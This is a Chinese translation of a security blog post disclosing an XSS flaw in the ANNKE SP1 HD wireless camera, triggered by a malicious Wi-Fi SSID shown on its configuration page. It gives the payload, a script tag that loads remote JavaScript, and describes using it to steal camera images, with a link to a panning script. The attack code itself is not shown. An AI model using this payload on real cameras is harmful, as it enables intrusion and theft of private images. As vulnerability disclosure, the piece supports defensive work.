如何通过XSS入侵网络摄像头

2 天前文章归档 1

1Start

我们在ANNKE SP1 HD无线摄像头(固件版本v3.4.1.1604071109)中发现了一个风险较低但十分有趣的XSS。有趣的是，在Annke Web界面中查看可用的Wi-Fi接入点时会触发XSS。

因此，如果在摄像头的WIFI范围内有如下SSID：

"<script src=//xjs.io></script>

当受害者访问无线配置页面时，SP1相机将加载并运行在http://xjs.io/上的JavaScript代码。这是因为他扫描了附近的无线网络，并将能够连接的SSID直接显示在了页面上。

2如何利用

为了验证我们的想法，我们编写一个脚本来从相机中窃取图像。

利用XSS获取图像：

官方可能已经修复了它，显然，人们现在需要开始关心物理接近利用这个问题，虽然它并不是一个巨大的漏洞。但它确实说明供应商需要小心验证来自任何源的输入，而不仅仅是Web界面上的GET/POST参数。

3
做点更有趣的事情

如果你想做点更有意思的事，可以使用这个脚本https://github.com/pentestpartners/bits-for-blog/blob/master/annke-spin.js让摄像头进行平移。

附上代码:

本文翻译自:

https://www.pentestpartners.com/security-blog/nifty-xss-in-annke-sp1-hd-wireless-camera/

“IT同路人”微信公众号

工欲善其事，必先利其器。